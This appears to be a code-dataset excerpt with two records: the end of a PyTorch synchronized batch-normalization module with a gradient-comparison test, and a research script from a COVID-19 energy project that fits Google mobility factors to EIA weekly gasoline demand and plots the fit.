for _ in range(ctx.master_queue.maxsize):
ex_w, exs_w = ctx.master_queue.get()
ctx.master_queue.task_done()
ex.append(ex_w.unsqueeze(0))
exs.append(exs_w.unsqueeze(0))
ex = comm.gather(ex).mean(0)
exs = comm.gather(exs).mean(0)
tensors = comm.broadcast_coalesced((ex, exs), [ex.get_device()] + ctx.worker_ids)
for ts, queue in zip(tensors[1:], ctx.worker_queues):
queue.put(ts)
else:
ctx.master_queue.put((ex, exs))
ex, exs = ctx.worker_queue.get()
ctx.worker_queue.task_done()
var = exs - ex ** 2
running_mean.mul_(1 - ctx.momentum).add_(ctx.momentum * ex)
running_var.mul_(1 - ctx.momentum).add_(ctx.momentum * var)
ctx.mark_dirty(running_mean, running_var)
y = syncbn_gpu.batch_norm_transform_input(x, gamma, beta, ex, exs, ctx.eps)
ctx.save_for_backward(x, ex, exs, gamma, beta)
return y
@staticmethod
def backward(ctx, grad_ouput):
x, ex, exs, gamma, beta = ctx.saved_tensors
grad_gamma, grad_beta, grad_ex, grad_exs = \
syncbn_gpu.batch_norm_collect_grad_statistics(x, grad_ouput, gamma, ex, exs, ctx.eps)
if ctx.training:
if ctx.sync:
if ctx.is_master:
grad_ex, grad_exs = [grad_ex.unsqueeze(0)], [grad_exs.unsqueeze(0)]
for _ in range(ctx.master_queue.maxsize):
grad_ex_w, grad_exs_w = ctx.master_queue.get()
ctx.master_queue.task_done()
grad_ex.append(grad_ex_w.unsqueeze(0))
grad_exs.append(grad_exs_w.unsqueeze(0))
grad_ex = comm.gather(grad_ex).mean(0)
grad_exs = comm.gather(grad_exs).mean(0)
tensors = comm.broadcast_coalesced((grad_ex, grad_exs), [grad_ex.get_device()] + ctx.worker_ids)
for ts, queue in zip(tensors[1:], ctx.worker_queues):
queue.put(ts)
else:
ctx.master_queue.put((grad_ex, grad_exs))
grad_ex, grad_exs = ctx.worker_queue.get()
ctx.worker_queue.task_done()
grad_input = syncbn_gpu.batch_norm_input_backward(x, grad_ouput, gamma, ex, exs, grad_ex, grad_exs, ctx.eps)
return grad_input, grad_gamma, grad_beta, None, None, None, None, None, None
class SyncBN(_BatchNorm):
def __init__(self, num_features, eps=1e-5, momentum=0.1, affine=True,
track_running_stats=True, sync=True):
super(SyncBN, self).__init__(num_features, eps=1e-5, momentum=0.1, affine=True,
track_running_stats=True)
self.devices = list(range(torch.cuda.device_count()))
self.sync = sync if len(self.devices) > 1 else False
self.worker_ids = self.devices[1:]
self.master_queue = Queue(len(self.worker_ids))
self.worker_queues = [Queue(1) for _ in self.worker_ids]
def forward(self, x):
if self.training and self.sync:
if x.get_device() == self.devices[0]:
extra = {
'is_master': True,
'master_queue': self.master_queue,
'worker_queues': self.worker_queues,
'worker_ids': self.worker_ids
}
else:
extra = {
'is_master': False,
'master_queue': self.master_queue,
'worker_queue': self.worker_queues[self.worker_ids.index(x.get_device())]
}
return SyncBNFucntion.apply(x, self.weight, self.bias, self.running_mean, self.running_var,
extra, self.training, self.momentum, self.eps)
else:
exponential_average_factor = 0.0
if self.training and self.track_running_stats:
# TODO: if statement only here to tell the jit to skip emitting this when it is None
if self.num_batches_tracked is not None:
self.num_batches_tracked += 1
if self.momentum is None: # use cumulative moving average
exponential_average_factor = 1.0 / float(self.num_batches_tracked)
else: # use exponential moving average
exponential_average_factor = self.momentum
return F.batch_norm(
x, self.running_mean, self.running_var, self.weight, self.bias,
self.training or not self.track_running_stats,
exponential_average_factor, self.eps)
if __name__ == '__main__':
import numpy as np
device = torch.device('cuda')
torch.manual_seed(123)
x1 = torch.rand(32, 3, 200, 200, device=device, requires_grad=True)
model = SyncBN(3)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=1e-4)
model = torch.nn.DataParallel(model)
model.to(device)
y1 = model(x1)
z = y1.sum()
model.zero_grad()
z.backward()
optimizer.step()
torch.manual_seed(123)
x2 = torch.rand(32, 3, 200, 200, device=device, requires_grad=True)
model = torch.nn.BatchNorm2d(3)
model.to(device)
y2 = model(x2)
z = y2.sum()
model.zero_grad()
z.backward()
grad_x1 = x1.grad.data.cpu()
grad_x2 = x2.grad.data.cpu()
print((grad_x1 - grad_x2).abs().max())
y1 = y1.data.cpu()
y2 = y2.data.cpu()
print((y1 - y2).abs().max())
``` |
{
"source": "jiweiqi/covid19-energy",
"score": 2
} |
#### File: covid19-energy/PODA_Model_Code/PODA_6_GoogleMobility_EIA_Correlation_ActualMobility.py
```python
import pandas as pd
import numpy as np
from scipy.optimize import minimize, Bounds
from myFunctions import createFolder
import matplotlib.pyplot as plt
from sklearn.metrics import r2_score
'''
Data preparation
'''
#weekly fuel demand
today = pd.to_datetime('today')
today =today.strftime("%Y-%m-%d")
today = '2020-09-12'
PODA_Model = np.load("./PODA_Model_"+today+".npy",allow_pickle='TRUE').item()
google_Mobility_Day = PODA_Model['ML_File_Date']
start_Date = '04-05-2020'
end_Date = PODA_Model['ML_File_Date']
# end_Date = today
fuel_Demand_EIA = pd.read_excel('https://www.eia.gov/dnav/pet/xls/PET_CONS_WPSUP_K_W.xls',
sheet_name = 'Data 1',
header=2)
fuel_Demand_EIA['Date'] = pd.to_datetime(fuel_Demand_EIA['Date'])
fuel_Demand_EIA.rename(columns={'Weekly U.S. Product Supplied of Finished Motor Gasoline (Thousand Barrels per Day)':'Gasoline'},
inplace=True)
fuel_Demand_EIA = fuel_Demand_EIA.drop(columns=['Weekly U.S. Product Supplied of Petroleum Products (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Kerosene-Type Jet Fuel (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Distillate Fuel Oil (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Residual Fuel Oil (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Propane and Propylene (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Other Oils (Thousand Barrels per Day)'])
fuel_Demand_EIA_save = fuel_Demand_EIA[(fuel_Demand_EIA['Date'] >
pd.to_datetime('01-01-2020'))]
PODA_Model['Fuel_Demand_EIA'] = fuel_Demand_EIA_save
fuel_Demand_EIA = fuel_Demand_EIA[(fuel_Demand_EIA['Date'] > pd.to_datetime(start_Date))
& (fuel_Demand_EIA['Date'] <= pd.to_datetime(end_Date))]
fuel_Demand_EIA = fuel_Demand_EIA.set_index('Date')
case = 'mean'
data_used = PODA_Model['ML_Data']
data_used['date'] = data_used.index
data_used = data_used[(data_used['date'] > (pd.to_datetime(start_Date) - pd.DateOffset(days=7)))
& (data_used['date'] < pd.to_datetime(end_Date))]
NHTS_Category_Share = pd.read_excel('./data/NHTS.xlsx',
sheet_name='Category Share')
NHTS_State_Fuel_Share = pd.read_excel('./data/NHTS.xlsx',
sheet_name='State Fuel Share')
PODA_Model['NHTS Category Share'] = NHTS_Category_Share
PODA_Model['NHTS State Fuel Share'] = NHTS_State_Fuel_Share
df_StateName_Code = pd.read_excel('./data/US_StateCode_List.xlsx',
sheet_name='Sheet1',
header=0)
cols = ['State Name']
data_used = data_used.join(df_StateName_Code.set_index(cols),
on=cols,
how='left')
data_used = data_used.join(NHTS_Category_Share.set_index('State Code'),
on='State Code',
how='left')
EIA_fuel = fuel_Demand_EIA[['Gasoline']]
def min_func(factor):
global EIA_fuel
data_used['work factor'] = 1 + data_used['workplaces']/100*factor[0]
data_used['school factor'] = 1 + data_used['workplaces']/100*factor[1]
data_used['medical factor'] = 1 + data_used['grocery_and_pharmacy']/100*factor[2]
data_used['shopping factor'] = 1 + data_used['grocery_and_pharmacy']/100*factor[3]
data_used['social factor'] = 1 + data_used['retail_and_recreation']/100*factor[4]
data_used['park factor'] = 1 + data_used['parks']/100*factor[5]
data_used['transport someone factor'] = 1 + data_used['retail_and_recreation']/100*factor[7]
data_used['meals factor'] = 1 + data_used['retail_and_recreation']/100*factor[6]
data_used['else factor'] = 1+ data_used['retail_and_recreation']/100*factor[7]
data_used['accumulated factor'] = (
data_used['Work'] * data_used['work factor'] +
data_used['School/Daycare/Religious activity'] * data_used['school factor'] +
data_used['Medical/Dental services']*data_used['medical factor'] +
data_used['Shopping/Errands']*data_used['shopping factor'] +
data_used['Social/Recreational']*factor[8]*data_used['social factor'] +
data_used['Social/Recreational']*(1-factor[8])*data_used['park factor'] +
data_used['Meals']*data_used['meals factor'] +
data_used['Transport someone']*data_used['transport someone factor'] +
data_used['Something else']*data_used['else factor'])/100 + factor[9]
DayShift = int(factor[10])
aa = data_used.join(NHTS_State_Fuel_Share.set_index('State Name'),
on='State Name',
how='left')
aa['fuel factor'] = aa['accumulated factor'] * aa['Percentage gasoline']
x = aa.sum(level='date')
x = x[['fuel factor','WeekDay']]
x['WeekDay'] = x['WeekDay']/50
baseline = 8722
x['Shifted Date'] = x.index + pd.DateOffset(days=DayShift)
for i, date_i in enumerate(fuel_Demand_EIA.index):
Google_weekly = x[(x['Shifted Date']<=pd.to_datetime(date_i))
& (x['Shifted Date']>(pd.to_datetime(date_i)-pd.DateOffset(days=7)))]
EIA_fuel.loc[date_i, 'Google'] = Google_weekly['fuel factor'].mean(axis =0)
EIA_fuel = EIA_fuel.dropna()
EIA_fuel['fuelpred'] = EIA_fuel['Google']*baseline
EIA_fuel['least_square'] = ((EIA_fuel['Gasoline']-EIA_fuel['fuelpred'])/EIA_fuel['Gasoline'])**2
retu = EIA_fuel['least_square'].sum()
return retu
#index (0) (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)
x0 = [ 1, 1, 1, 1, 1, 1, 1, 1, 0.5, 0, 0]
bounds = Bounds([0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0, 0, 0],
[1.2, 1.2, 1.2, 1.2, 1.2, 2, 1.2, 1.2, 1, 0.05, 10])
res = minimize(min_func, x0, method='SLSQP', bounds=bounds)
print('optim factor = ')
for index, val in np.ndenumerate(res.x):
print('\t factor[{}] = {:.2e}'.format(index[0], val))
print('optim loss = {:.3e}'.format(res.fun))
a = res.x
createFolder('./Fuel Demand Projection')
np.savetxt('./Fuel Demand Projection/Fuel_mobility_factor'
+ google_Mobility_Day +'.csv', a, delimiter = ",")
PODA_Model['Google_Mobility_EIA_Factor'] = a
np.save(("./PODA_Model_"+today+".npy"), PODA_Model)
r2 = r2_score(EIA_fuel['fuelpred'], EIA_fuel['Gasoline'])
print('r2 = {:.4e}'.format(r2))
fig1 = plt.figure(figsize=(6, 5))
ax1 = fig1.add_subplot(1, 1, 1)
ax1.plot(EIA_fuel.index, EIA_fuel['fuelpred'], '-',
label='pred')
ax1.plot(EIA_fuel.index, EIA_fuel['Gasoline'], '--o',
label='EIA')
ax1.set_xlabel('Date')
ax1.set_ylabel('Fuel Demand')
plt.xticks(rotation=45)
ax1.legend()
fig1 = plt.figure(figsize=(6, 5))
ax1 = fig1.add_subplot(1, 1, 1)
ax1.plot(EIA_fuel['Gasoline'], EIA_fuel['fuelpred'], 'o',
label='pred')
ax1.plot([EIA_fuel['Gasoline'].min(), EIA_fuel['Gasoline'].max()],
[EIA_fuel['Gasoline'].min(), EIA_fuel['Gasoline'].max()],
'--',
label='y = x')
ax1.set_xlabel('True')
ax1.set_ylabel('Pred')
ax1.legend()
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.